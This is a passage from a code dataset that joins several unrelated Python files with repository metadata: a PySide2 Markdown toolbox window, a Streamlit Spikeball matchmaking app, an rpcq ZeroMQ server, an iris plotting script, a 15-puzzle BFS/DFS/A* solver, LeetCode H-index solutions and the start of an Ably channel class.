PySide2.QtGui import *\nfrom PySide2.QtWidgets import *\n\nfrom moduels.component.NormalValue import 常量\nfrom moduels.gui.Tab_ClearAttatchment import Tab_ClearAttatchment\nfrom moduels.gui.Tab_Config import Tab_Config\n# try:\nfrom moduels.gui.Tab_CopyMdFile import Tab_CopyMdFile\nfrom moduels.gui.Tab_Help import Tab_Help\nfrom moduels.gui.Tab_LocalizeMdFile import Tab_LocalizeMdFile\nfrom moduels.gui.Tab_Stdout import Tab_Stdout\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.loadStyleSheet()\n self.initElements() # 先初始化各个控件\n self.initSlots() # 再将各个控件连接到信号槽\n self.initLayouts() # 然后布局\n self.initValues() # 再定义各个控件的值\n\n\n # self.setWindowState(Qt.WindowMaximized)\n # sys.stdout = Stream(newText=self.onUpdateText)\n\n def initElements(self):\n self.状态栏 = self.statusBar()\n self.标签页控件 = QTabWidget() # 定义中心控件为多 tab 页面\n\n self.设置标签页 = Tab_Config()\n\n self.复制功能标签页 = Tab_CopyMdFile()\n self.离线化功能标签页 = Tab_LocalizeMdFile()\n self.清理功能标签页 = Tab_ClearAttatchment()\n self.控制台标签页 = Tab_Stdout()\n self.帮助标签页 = Tab_Help()\n\n def initSlots(self):\n self.复制功能标签页.状态栏消息.connect(lambda 消息, 时间: self.状态栏.showMessage(消息, 时间))\n self.离线化功能标签页.状态栏消息.connect(lambda 消息, 时间: self.状态栏.showMessage(消息, 时间))\n self.清理功能标签页.状态栏消息.connect(lambda 消息, 时间: self.状态栏.showMessage(消息, 时间))\n\n def initLayouts(self):\n self.setCentralWidget(self.标签页控件)\n self.标签页控件.addTab(self.复制功能标签页, self.tr('复制'))\n self.标签页控件.addTab(self.离线化功能标签页, self.tr('离线化'))\n self.标签页控件.addTab(self.清理功能标签页, self.tr('清理'))\n # self.标签页控件.addTab(self.控制台标签页, self.tr('控制台'))\n self.标签页控件.addTab(self.设置标签页, self.tr('设置'))\n self.标签页控件.addTab(self.帮助标签页, self.tr('帮助'))\n\n def initValues(self):\n # self.窗口标题 = 'MarkDown 工具箱'\n 常量.状态栏 = self.状态栏\n self.setWindowTitle('MarkDown 工具箱')\n self.setWindowIcon(QIcon(常量.图标路径))\n self.setWindowFlag(Qt.WindowStaysOnTopHint) # 始终在前台\n self.show()\n\n def loadStyleSheet(self):\n try:\n try:\n with open(常量.样式文件, 'r', encoding='utf-8') as style:\n self.setStyleSheet(style.read())\n except:\n with open(常量.样式文件, 'r', encoding='gbk') as style:\n self.setStyleSheet(style.read())\n except:\n QMessageBox.warning(self, self.tr('主题载入错误'), self.tr('未能成功载入主题,请确保软件 misc 目录有 \"style.css\" 文件存在。'))\n\n def keyPressEvent(self, event) -> None:\n # 在按下 F5 的时候重载 style.css 主题\n if (event.key() == Qt.Key_F5):\n self.loadStyleSheet()\n self.状态栏.showMessage('已成功更新主题', 800)\n\n def closeEvent(self, event):\n \"\"\"Shuts down application on close.\"\"\"\n # Return stdout to defaults.\n if 常量.关闭时隐藏到托盘:\n event.ignore()\n self.hide()\n else:\n sys.stdout = sys.__stdout__\n super().closeEvent(event)\n","repo_name":"HaujetZhao/Markdown-Toolbox","sub_path":"src/moduels/gui/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"zh","doc_type":"code","stars":55,"dataset":"github-code","pt":"3"} +{"seq_id":"6295009615","text":"import streamlit as st\n\nfrom matchmaking.data import Player\nfrom matchmaking.generator import get_most_diverse_matchups\n\n\ndef init_state():\n\n if \"players\" not in st.session_state:\n st.session_state.players = []\n\n if 'matchups' not in st.session_state:\n st.session_state.matchups = []\n \n if 'matchup_gen_score' not in st.session_state:\n st.session_state.matchup_gen_score = 0.0\n \n if 'results' not in st.session_state:\n st.session_state.results = {}\n\n if 'NUM_ITERATIONS' not in st.session_state:\n st.session_state.NUM_ITERATIONS = 10000\n\n if 'NUM_ROUNDS' not in st.session_state:\n st.session_state.NUM_ROUNDS = 10\n\n if 'NUM_FIELDS' not in st.session_state:\n st.session_state.NUM_FIELDS = 1\n\n if 'WEIGHT_METRIC_CONFIG' not in st.session_state:\n st.session_state.WEIGHT_METRIC_CONFIG = {}\n \n\n\ndef input_new_players():\n st.write(\"#### Player selection\")\n new_player = st.text_input('New player name (or list of players seperated by comma):', key='input_new_player_name', placeholder=\"Name OR Name1,Name2,Name3,Name4,...\")\n\n st.button('Add player', key='button_add_player',\n on_click=_submit_add_player, args=(new_player, ))\n\n st.write(\"Current players:\")\n st.write([str(x) for x in st.session_state.players])\n \ndef _submit_add_player(player_phrase: str):\n \n if player_phrase == \"\":\n st.warning(f\"Please insert a player name or a comma separated list of names.\")\n return\n \n if \",\" in player_phrase:\n players = player_phrase.split(\",\")\n else:\n players = [player_phrase]\n \n for player_name in players:\n player = Player(player_name)\n if player.get_unique_identifier() in [x.get_unique_identifier() for x in st.session_state.players]:\n st.warning(f'The name \"{player}\" already exists.')\n else:\n st.session_state.players.append(player)\n \ndef show_max_matchups():\n st.session_state.max_matchups = _calculate_max_matchups(len(st.session_state.players))\n st.write(\"Max possible amount of unique matchups:\", st.session_state.max_matchups)\n\ndef _calculate_max_matchups(num_players) -> int:\n\n n = num_players\n\n return int(((n * n - n) / 8) * (n * n - 5 * n + 6))\n\n\ndef configure():\n st.write(\"## Configuration\")\n \n input_new_players()\n \n st.write(\"#### Game Params\")\n st.session_state.NUM_ROUNDS = st.slider('Number of Rounds:', min_value=1, max_value=100, value=_get_default_num_rounds())\n st.session_state.NUM_FIELDS = st.slider('Number of Fields:', min_value=1, max_value=10, value=1)\n \n st.write(\"#### Optimization Params\")\n st.session_state.NUM_ITERATIONS = st.slider('Number of Optimization Iterations:', min_value=1000, max_value=100000, value=10000)\n \n st.write(\"#### Metric Weights\")\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_not_playing_players_index\"] = 100000.0\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_played_matches_index\"] = 10000.0\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_player_engagement_fairness_index\"] = st.slider('Weight for Global Player Engagement Fairness Index:', 0.0, 100.0, 10.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_teammate_succession_index\"] = st.slider('Weight for Global Teammate Succession Index:', 0.0, 100.0, 10.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_enemy_team_succession_index\"] = st.slider('Weight for Global Enemy Team Succession Index:', 0.0, 100.0, 10.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_player_engagement_index\"] = st.slider('Weight for Global Player Engagement Index:', 0.0, 100.0, 5.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_teammate_variety_index\"] = st.slider('Weight for Global Teammate Variety Index:', 0.0, 100.0, 5.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_enemy_team_variety_index\"] = st.slider('Weight for Global Enemy Team Variety Index:', 0.0, 100.0, 5.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_break_occurrence_index\"] = st.slider('Weight for Global Break Occurrence Index:', 0.0, 100.0, 5.0)\n st.session_state.WEIGHT_METRIC_CONFIG[\"global_break_shortness_index\"] = st.slider('Weight for Global Break Shortness Index:', 0.0, 100.0, 5.0)\n st.write(f\"Weight for Global Not Playing Players Index [CONSTANT]:\", st.session_state.WEIGHT_METRIC_CONFIG[\"global_not_playing_players_index\"])\n st.write(f\"Weight for Global Played Matches Index [CONSTANT]:\", st.session_state.WEIGHT_METRIC_CONFIG[\"global_played_matches_index\"])\n\ndef _get_default_num_rounds() -> int:\n if st.session_state.max_matchups > 0:\n return st.session_state.max_matchups\n else:\n return 10\n\ndef matchup_generation():\n st.write(\"## Matchup generation\")\n \n show_max_matchups()\n\n st.button('Generate matchups [may take a while...]', key='button_gen_10_matchup',\n on_click=_gen_matchup_batch)\n \n st.write(st.session_state.matchups)\n \n st.write(\"Score (lower is better):\", st.session_state.matchup_gen_score)\n \ndef _gen_matchup_batch():\n \n if len(st.session_state.players) < 4:\n st.warning(f\"Not enough players to generate matchups: {len(st.session_state.players)}. Four players are needed at least.\")\n return\n \n weight_metric_config = [ (value, key) for key, value in st.session_state.WEIGHT_METRIC_CONFIG.items()]\n \n print(weight_metric_config)\n \n best_matchup_config, best_score, results = get_most_diverse_matchups(\n st.session_state.players, \n st.session_state.NUM_ROUNDS, \n st.session_state.NUM_FIELDS, \n st.session_state.NUM_ITERATIONS, \n weight_metric_config\n )\n \n st.session_state.matchups = best_matchup_config\n st.session_state.matchup_gen_score = best_score\n st.session_state.results = results\n\ndef additional_info():\n st.write(\"#### Additional Result Info\")\n st.write(\"Matchup Statistics:\", st.session_state.results)\n\ndef main():\n\n init_state()\n\n st.write(\"\"\"\n # Spikeball WebApp\n Generate optimal matchups.\n \"\"\")\n \n matchup_generation()\n configure()\n additional_info()\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"TimoIllusion/spikeball-matchmaking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13842910043","text":"import asyncio\nimport logging\nfrom asyncio import AbstractEventLoop\nfrom typing import Callable\nfrom datetime import datetime\n\nimport zmq.asyncio\n\nfrom rpcq._base import to_msgpack, from_msgpack\nfrom rpcq._spec import RPCSpec\nfrom rpcq.messages import RPCRequest\n\n_log = logging.getLogger(__name__)\n\n\nclass Server:\n \"\"\"\n Server that accepts JSON RPC calls through a socket.\n \"\"\"\n def __init__(self, rpc_spec: RPCSpec = None, announce_timing: bool = False,\n serialize_exceptions: bool = True):\n \"\"\"\n Create a server that will be linked to a socket\n\n :param rpc_spec: JSON RPC spec\n :param announce_timing:\n :param serialize_exceptions: If set to True, this Server will catch all exceptions occurring\n internally to it and, when possible, communicate them to the interrogating Client. If\n set to False, this Server will re-raise any exceptions it encounters (including, but not\n limited to, those which might occur through method calls to rpc_spec) for Server's\n local owner to handle.\n\n IMPORTANT NOTE: When set to False, this *almost definitely* means an unrecoverable\n crash, and the Server should then be _shutdown().\n \"\"\"\n self.announce_timing = announce_timing\n self.serialize_exceptions = serialize_exceptions\n\n self.rpc_spec = rpc_spec if rpc_spec else RPCSpec(serialize_exceptions=serialize_exceptions)\n self._exit_handlers = []\n\n self._socket = None\n\n def rpc_handler(self, f: Callable):\n \"\"\"\n Add a function to the server. It will respond to JSON RPC requests with the corresponding method name.\n This can be used as both a side-effecting function or as a decorator.\n\n :param f: Function to add\n :return: Function wrapper (so it can be used as a decorator)\n \"\"\"\n return self.rpc_spec.add_handler(f)\n\n def exit_handler(self, f: Callable):\n \"\"\"\n Add an exit handler - a function which will be called when the server shuts down.\n\n :param f: Function to add\n \"\"\"\n self._exit_handlers.append(f)\n\n async def run_async(self, endpoint: str):\n \"\"\"\n Run server main task (asynchronously).\n\n :param endpoint: Socket endpoint to listen to, e.g. \"tcp://*:1234\"\n \"\"\"\n self._connect(endpoint)\n\n # spawn an initial listen task\n listen_task = asyncio.ensure_future(self._socket.recv_multipart())\n task_list = [listen_task]\n\n while True:\n dones, pendings = await asyncio.wait(task_list, return_when=asyncio.FIRST_COMPLETED)\n\n # grab one \"done\" task to handle\n task_list, done_list = list(pendings), list(dones)\n done = done_list.pop()\n task_list += done_list\n\n if done == listen_task:\n try:\n # empty_frame may either be:\n # 1. a single null frame if the client is a REQ socket\n # 2. an empty list (ie. no frames) if the client is a DEALER socket\n identity, *empty_frame, msg = done.result()\n request = from_msgpack(msg)\n\n # spawn a processing task\n task_list.append(asyncio.ensure_future(\n self._process_request(identity, empty_frame, request)))\n except Exception as e:\n if self.serialize_exceptions:\n _log.exception('Exception thrown in Server run loop during request '\n 'reception: {}'.format(str(e)))\n else:\n raise e\n finally:\n # spawn a new listen task\n listen_task = asyncio.ensure_future(self._socket.recv_multipart())\n task_list.append(listen_task)\n else:\n # if there's been an exception during processing, consider reraising it\n try:\n done.result()\n except Exception as e:\n if self.serialize_exceptions:\n _log.exception('Exception thrown in Server run loop during request '\n 'dispatch: {}'.format(str(e)))\n else:\n raise e\n\n def run(self, endpoint: str, loop: AbstractEventLoop = None):\n \"\"\"\n Run server main task.\n\n :param endpoint: Socket endpoint to listen to, e.g. \"tcp://*:1234\"\n :param loop: Event loop to run server in (alternatively just use run_async method)\n \"\"\"\n if not loop:\n loop = asyncio.get_event_loop()\n\n try:\n loop.run_until_complete(self.run_async(endpoint))\n except KeyboardInterrupt:\n self._shutdown()\n\n def stop(self):\n \"\"\"\n DEPRECATED\n \"\"\"\n pass\n\n def _shutdown(self):\n \"\"\"\n Shut down the server.\n \"\"\"\n for exit_handler in self._exit_handlers:\n exit_handler()\n\n if self._socket:\n self._socket.close()\n self._socket = None\n\n def _connect(self, endpoint: str):\n \"\"\"\n Connect the server to an endpoint. Creates a ZMQ ROUTER socket for the given endpoint.\n\n :param endpoint: Socket endpoint, e.g. \"tcp://*:1234\"\n \"\"\"\n if self._socket:\n raise RuntimeError('Cannot run multiple Servers on the same socket')\n\n context = zmq.asyncio.Context()\n self._socket = context.socket(zmq.ROUTER)\n self._socket.bind(endpoint)\n\n _log.info(\"Starting server, listening on endpoint {}\".format(endpoint))\n\n async def _process_request(self, identity: bytes, empty_frame: list, request: RPCRequest):\n \"\"\"\n Executes the method specified in a JSON RPC request and then sends the reply to the socket.\n\n :param identity: Client identity provided by ZeroMQ\n :param empty_frame: Either an empty list or a single null frame depending on the client type\n :param request: JSON RPC request\n \"\"\"\n try:\n _log.debug(\"Client %s sent request: %s\", identity, request)\n start_time = datetime.now()\n reply = await self.rpc_spec.run_handler(request)\n if self.announce_timing:\n _log.info(\"Request {} for {} lasted {} seconds\".format(\n request.id, request.method, (datetime.now() - start_time).total_seconds()))\n\n _log.debug(\"Sending client %s reply: %s\", identity, reply)\n await self._socket.send_multipart([identity, *empty_frame, to_msgpack(reply)])\n except Exception as e:\n if self.serialize_exceptions:\n _log.exception('Exception thrown in _process_request')\n else:\n raise e\n\n","repo_name":"guilhermemoriggidesouza/api-flask-to-reuse","sub_path":"env/Lib/site-packages/rpcq/_server.py","file_name":"_server.py","file_ext":"py","file_size_in_byte":6908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19551028243","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nimport seaborn as sns;\nsns.set(style=\"ticks\", color_codes=True)\n\nimport pandas as pd\npd.set_option('precision', 2) # 2 decimal places\npd.set_option('display.max_rows', 20)\npd.set_option('display.max_columns', 30)\npd.set_option('display.width', 100) # wide windows\n\n\n\nimport sklearn\nfrom sklearn.datasets import load_iris\niris = load_iris()\n\n# Extract numpy arrays\nX = iris.data \ny = iris.target\n\n\n# Convert to pandas dataframe \ndf = pd.DataFrame(data=X, columns=['sl', 'sw', 'pl', 'pw'])\n# create column for labels\ndf['label'] = pd.Series(iris.target_names[y], dtype='category')\n\n\n# 2d scatterplot\n#https://seaborn.pydata.org/generated/seaborn.pairplot.html\n\n# Make a dataframe with nicer labels for printing\n#iris_df = sns.load_dataset(\"iris\")\niris_df = df.copy()\niris_df.columns = iris['feature_names'] + ['label'] \n\n\ng = sns.pairplot(iris_df, vars = iris_df.columns[0:4], hue=\"label\")\nplt.tight_layout()\nplt.savefig(\"../figures/iris_pairplot.pdf\")\nplt.show()\n\nif 0:\n # pick ugly colors to match iris_dtree.py\n palette = {'setosa': 'red', 'versicolor': 'yellow', 'virginica': 'blue' }\n g = sns.pairplot(iris_df, vars = iris_df.columns[0:4] ,\n hue=\"label\", palette=palette)\n plt.savefig(\"../figures/iris_pairplot-ryb.pdf\")\n plt.show()\n\nsns.stripplot(x=\"label\", y=\"sl\", data=df, jitter=True)\nplt.savefig('../figures/iris_sepal_length_strip_plot.pdf', dpi=300);","repo_name":"uniontm/pyprobml","sub_path":"scripts/iris_plot.py","file_name":"iris_plot.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"27397860460","text":"import sys\nimport re\nimport os\nfrom copy import deepcopy\nfrom time import perf_counter_ns\n\nrecursionLimit = 20\n\nfinalBoard = []\n\nvisitedBoardStates = []\n\ndef fillFinalBoard(size):\n\n currentNumber = 1\n\n for x in range(size[0]):\n row = []\n\n for y in range(size[1]):\n row.append(currentNumber)\n currentNumber += 1\n\n finalBoard.append(row)\n\n finalBoard[-1][-1] = 0\n\n\n\ndef validatePath(board, move):\n\n for x, y in ((row, column) for row in range(len(board)) for column in range(len(board[0]))):\n if not board[x][y]:\n break\n \n if move == 'L':\n if y-1 < 0 : return None, -1\n temp = board[x][y-1]\n board[x][y-1] = 0\n board[x][y] = temp\n y -= 1\n elif move == 'R' :\n if y+1 >= len(board[0]) : return None, -1\n temp = board[x][y+1]\n board[x][y+1] = 0\n board[x][y] = temp\n y += 1\n elif move == 'U' :\n if x-1 < 0 : return None, -1\n temp = board[x-1][y]\n board[x-1][y] = 0\n board[x][y] = temp\n x -= 1\n else :\n if x+1 >= len(board) : return None, -1\n temp = board[x+1][y]\n board[x+1][y] = 0\n board[x][y] = temp\n x += 1\n\n if hash(str(board)) in visitedBoardStates:\n return None, -1\n\n visitedBoardStates.append(hash(str(board)))\n \n if not hash(str(board)) == hash(str(finalBoard)):\n return board, 0\n\n return board, 1\n\n\n\n\ndef bfs(param, puzzle):\n\n visitedBoardStates.append(hash(str(puzzle)))\n processedStates = 0\n\n # queue of paths\n paths = []\n puzzles = [deepcopy(puzzle)]\n\n for direction in param: \n paths.append([direction])\n\n # do until there are paths to test\n while paths:\n\n currentPath = paths[0]\n del paths[0]\n\n if not processedStates % 4:\n currentPuzzle = puzzles[0]\n del puzzles[0]\n\n new_puzzle, validate = validatePath(deepcopy(currentPuzzle), currentPath[-1])\n processedStates += 1\n\n if validate == 1:\n return currentPath, processedStates, len(currentPath)\n elif validate == -1:\n continue\n\n\n for direction in param:\n paths.append(currentPath + [direction])\n puzzles.append(new_puzzle)\n\n\n # when no viable path is found\n return None, processedStates, recursionLimit\n \n\ndef dfs(param, puzzle, currentRecursion = 0, maxRecursion = 0, processedStates = 0, path = []):\n\n currentRecursion += 1\n\n if currentRecursion > maxRecursion:\n maxRecursion = recursionLimit\n\n if currentRecursion > recursionLimit:\n # maxRecursion = recursionLimit\n return None, processedStates, maxRecursion\n \n for direction in param:\n newPath = deepcopy(path)\n newPath.append(direction)\n new_puzzle, validate = validatePath(deepcopy(puzzle), direction)\n processedStates += 1\n if validate == 1:\n return deepcopy(newPath), processedStates, maxRecursion\n elif validate == -1:\n continue\n\n resultPath, processedStates, maxRecursion = dfs(param, deepcopy(new_puzzle), deepcopy(currentRecursion), maxRecursion, processedStates, deepcopy(newPath))\n\n if resultPath:\n return resultPath, processedStates, maxRecursion\n \n return None, processedStates, maxRecursion\n \n\ndef manh(puzzle):\n distance = 0\n current_value = 0\n\n for i in range(len(puzzle)):\n for j in range(len(puzzle[0])):\n tmp = puzzle[i][j]\n current_value += 1\n x = (tmp - 1) // len(puzzle)\n y = (tmp - 1) % len(puzzle[0])\n if tmp == 0:\n x = len(puzzle) - 1\n y = len(puzzle[0]) - 1\n distance += abs(i - x) + abs(j - y)\n\n return distance\n\n\ndef hamm(puzzle):\n distance = 0\n current_value = 0\n\n for i in range(len(puzzle)):\n for j in range(len(puzzle[0])):\n tmp = puzzle[i][j]\n current_value += 1\n if tmp == 0 and i == len(puzzle) - 1 and j == len(puzzle[0]) - 1:\n continue\n if tmp != current_value:\n distance += 1\n\n return distance\n\nclass Node():\n def __init__(self, puzzle, path):\n self.puzzle = puzzle\n self.path = path\n self.dist_from_start: int = 0\n self.aprox_dist_from_start: int = 0\n\ndef astr(param, puzzle):\n\n distance_func = manh if param == \"manh\" else hamm\n\n processedStates = 0\n\n state_scores = {}\n open_list: list[Node] = []\n open_list.append(Node(deepcopy(puzzle), []))\n\n while len(open_list) > 0:\n\n processedStates += 1\n\n current_node = open_list[0]\n for node in open_list:\n if node.aprox_dist_from_start < current_node.aprox_dist_from_start:\n current_node = node\n open_list.remove(current_node)\n\n if hash(str(current_node.puzzle)) == hash(str(finalBoard)):\n return current_node.path\n\n for direction in ['L','R','U','D']:\n new_puzzle, validate = validatePath(deepcopy(current_node.puzzle), direction)\n\n if validate == -1:\n continue\n elif validate == 1:\n result = deepcopy(current_node.path)\n result.append(direction)\n return result, processedStates, len(result)\n\n\n distance_from_start = current_node.dist_from_start + 1\n aprox_distance = distance_from_start + \\\n distance_func(new_puzzle)\n\n if (hash(str(new_puzzle)) not in state_scores) or (distance_from_start < state_scores[hash(str(new_puzzle))]):\n\n state_scores[hash(str(new_puzzle))] = distance_from_start\n newPath = deepcopy(current_node.path)\n newPath.append(direction)\n new_node = Node(new_puzzle, newPath)\n new_node.dist_from_start = distance_from_start\n new_node.aprox_dist_from_start = aprox_distance\n open_list.append(new_node)\n\n'''\n\npuzzleHandle = open(\"C:\\\\Users\\\\maste\\\\Desktop\\\\other\\\\SISE_15\\\\puzzles\\\\4x4_07_00008.txt\")\ngameSize = [int(x) for x in puzzleHandle.readline().split()]\ngameFrame = [[int(x) for x in line.split()] for line in puzzleHandle]\n\nfillFinalBoard(gameSize)\n\n# visitedBoardStates.append(hash(str(gameFrame)))\nprint(dfs(\"LUDR\", gameFrame))\n#'''\n#'''\nif __name__ == '__main__':\n\n strategy = sys.argv[1]\n param = sys.argv[2]\n puzzleFile = sys.argv[3]\n solutionFile = sys.argv[4]\n statisticsFile = sys.argv[5]\n \n '''\n strategy = 'dfs'\n param = \"RDUL\"\n puzzleFile = \"4x4_07_00008.txt\"\n solutionFile = \"4x4_07_0008_dfs_LUDR_sol.txt\"\n statisticsFile = \"4x4_07_0008_dfs_LUDR_stats.txt\"\n '''\n \n\n if strategy not in ['bfs', 'dfs', 'astr']:\n raise Exception(\"Unknown strategy given.\")\n\n if strategy == 'astr' and param not in ['hamm', 'manh']:\n raise Exception(\"Unknown heuristic for A* strategy given.\")\n\n # elif not (re.match(r'^(?=.*R)(?=.*U)(?=.*L)(?=.*D).*$', param) and len(param) == 4):\n # raise Exception(\"Unknown search order given.\")\n\n # create directories if they don't exist\n if not os.path.exists(\"solutions\") : os.mkdir(\"solutions\")\n if not os.path.exists(\"solutions/\" + strategy) : os.mkdir(\"solutions/\" + strategy)\n if not os.path.exists(\"solutions/\" + strategy + \"/\" + param) : os.mkdir(\"solutions/\" + strategy + \"/\" + param)\n\n if not os.path.exists(\"statistics\") : os.mkdir(\"statistics\")\n if not os.path.exists(\"statistics/\" + strategy) : os.mkdir(\"statistics/\" + strategy)\n if not os.path.exists(\"statistics/\" + strategy + \"/\" + param) : os.mkdir(\"statistics/\" + strategy + \"/\" + param)\n\n path = None\n processedStates = None\n maxDepth = None\n\n puzzleFile = \"C:\\\\Users\\\\maste\\\\Desktop\\\\other\\\\SISE_15\\\\puzzles\\\\\" + puzzleFile\n\n puzzleHandle = open(puzzleFile)\n gameSize = [int(x) for x in puzzleHandle.readline().split()]\n gameFrame = [[int(x) for x in line.split()] for line in puzzleHandle]\n\n fillFinalBoard(gameSize)\n\n if strategy == \"bfs\":\n startTime = perf_counter_ns()\n path, processedStates, maxDepth = bfs(param, gameFrame)\n finalTime = (perf_counter_ns() - startTime) / 1000000\n elif strategy == \"dfs\" :\n visitedBoardStates.append(hash(str(gameFrame)))\n startTime = perf_counter_ns()\n path, processedStates, maxDepth = dfs(param, gameFrame)\n finalTime = (perf_counter_ns() - startTime) / 1000000\n else:\n startTime = perf_counter_ns()\n path, processedStates, maxDepth = astr(param, gameFrame)\n finalTime = (perf_counter_ns() - startTime) / 1000000\n\n\n\n # startTime = perf_counter()\n # exec(\"path, processedStates, maxDepth = \" + strategy + \"(param, gameFrame)\")\n # finalTime = (perf_counter() - startTime) / 1000000\n\n visitedStates = len(visitedBoardStates)\n solutionLength = len(path) if path else -1\n\n f = open(\"solutions/\" + strategy + \"/\" + param + \"/\" + solutionFile, 'w')\n if path:\n f.write(str(solutionLength) + \"\\n\" + ''.join(path))\n else:\n f.write(str(solutionLength))\n f.close()\n\n f = open(\"statistics/\" + strategy + \"/\" + param + \"/\" + statisticsFile, 'w')\n if path:\n f.write(str(solutionLength) + \"\\n\" + str(visitedStates) + \"\\n\" + str(processedStates) + \"\\n\" + str(maxDepth) + \"\\n\" + str(round(finalTime, 3)))\n else:\n f.write(str(solutionLength) + \"\\n\" + str(visitedStates) + \"\\n\" + str(processedStates) + \"\\n\" + str(maxDepth) + \"\\n\" + str(round(finalTime, 3)))\n f.close()\n\n#'''","repo_name":"zeregzesis/uni","sub_path":"Sztuczna inteligencja i systemy ekpertowe/Piętnastka/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":9622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16739652681","text":"print(\"[1] apple\\n[2] pear\\n[3] orange\\n[4] grape\\n[0] exit\")\nlst=[0,3.0,2.5,4.1,10.2]\ninp=list(map(int,input().strip().split()))\nfor i in range(5):\n x=inp[i]\n if x==0:\n break\n elif 1<=x<=4:\n print(\"price = %.2f\"%lst[x])\n else:\n print(\"price = 0.00\")\n \n","repo_name":"toooooodo/python-programming","sub_path":"7-9 查询水果价格 (15 分).py","file_name":"7-9 查询水果价格 (15 分).py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"34683677129","text":"import numpy as np\nimport chainer\nimport chainer.functions as F\n\nfrom ..base_mesh_accelerator import BaseMeshAccelerator\nfrom ...triangle_shape import TriangleShape\n\n\nclass BruteforceMeshAccelerator(BaseMeshAccelerator):\n \"\"\"\n BruteforceMeshAccelerator: Software Mesh Accelerator\n \"\"\"\n def __init__(self):\n self.triangles = []\n\n def intersect(self, ro, rd, t0, t1):\n s = self.triangles[0]\n t = t1\n info = s.intersect(ro, rd, t0, t)\n \n b = info['b']\n t = info['t']\n for i in range(1, len(self.triangles)):\n s = self.triangles[i]\n iinfo = s.intersect(ro, rd, t0, t)\n bb = iinfo['b']\n tt = iinfo['t']\n b = b + bb\n t = tt\n for k in iinfo.keys():\n if k in info:\n info[k] = F.where(bb, iinfo[k], info[k])\n else:\n info[k] = iinfo[k]\n info['b'] = b\n info['t'] = t\n return info\n\n def clear(self):\n self.triangles = []\n\n def add_triangle(self, t):\n t = TriangleShape(t.p0, t.p1, t.p2, t.id)\n self.triangles.append(t)\n\n def construct(self):\n pass","repo_name":"ototoi/drt","sub_path":"src/drt/shape/mesh_accelerator/sw/bruteforce_mesh_accelerator.py","file_name":"bruteforce_mesh_accelerator.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26961787255","text":"\"\"\"\nFollow up for H-Index (leet code 274): What if the citations array is sorted in ascending order? Could you optimize your algorithm?\n\nHide Company Tags Facebook\nHide Tags Binary Search\nHide Similar Problems (M) H-Index\n\n\"\"\"\n\n# MOWN Solution\nclass Solution(object):\n def hIndex(self, citations):\n \"\"\"\n :type citations: List[int]\n :rtype: int\n \"\"\"\n counter = 0\n for i in citations[::-1]:\n counter += 1\n if i >= counter:\n continue\n else:\n break\n else:\n return counter\n return counter -1\n\nclass Solution(object):\n def hIndex(self, citations):\n counter, i = 0, len(citations)-1\n while i >= 0:\n counter += 1\n temp = citations[i]\n i -= 1\n if temp < counter:\n break\n else:\n return counter\n return counter-1\n\n# LUP solution\n# Binary search\nclass Solution(object):\n def hIndex(self, citations):\n low, high, lenc = 0, len(citations) -1, len(citations)\n while low <= high:\n mid = (low+high)/2\n if citations[mid] == lenc - mid:\n return citations[mid]\n\n elif citations[mid] > lenc - mid:\n high = mid - 1\n\n else:\n low = mid + 1\n\n return lenc - low\n","repo_name":"tejamupparaju/LeetCode_Python","sub_path":"leet_code275.py","file_name":"leet_code275.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37858455391","text":"import base64\nfrom collections import OrderedDict\nimport logging\nimport json\nimport os\nfrom typing import Iterator\nfrom urllib import parse\n\nfrom methoddispatch import SingleDispatch, singledispatch\nimport msgpack\n\nfrom ably.http.paginatedresult import PaginatedResult, format_params\nfrom ably.types.channeldetails import ChannelDetails\nfrom ably.types.message import Message, make_message_response_handler\nfrom ably.types.presence import Presence\nfrom ably.util.crypto import get_cipher\nfrom ably.util.exceptions import catch_all, IncompatibleClientIdException\n\nlog = logging.getLogger(__name__)\n\n\nclass Channel(SingleDispatch):\n def __init__(self, ably, name, options):\n self.__ably = ably\n self.__name = name\n self.__base_path = '/channels/%s/' % parse.quote_plus(name, safe=':')\n self.__cipher = None\n self.options = options\n self.__presence = Presence(self)\n\n @catch_all\n async def history(self, direction=None, limit: int = None, start=None, end=None):\n \"\"\"Returns the history for this channel\"\"\"\n params = format_params({}, direction=direction, start=start, end=end, limit=limit)\n path = self.__base_path + 'messages' + params\n\n message_handler = make_message_response_handler(self.__cipher)\n return await PaginatedResult.paginated_query(\n self.ably.http, url=path, response_processor=message_handler)\n\n def __publish_request_body(self, messages):\n \"\"\"\n Helper private method, separated from publish() to test RSL1j\n \"\"\"\n # Idempotent publishing\n if self.ably.options.idempotent_rest_publishing:\n # RSL1k1\n if all(message.id is None for message in messages):\n base_id = base64.b64encode(os.urandom(12)).decode()\n for serial, message in enumerate(messages):\n message.id = '{}:{}'.format(base_id, serial)\n\n request_body_list = []\n for m in messages:\n if m.client_id == '*':\n raise IncompatibleClientIdException(\n 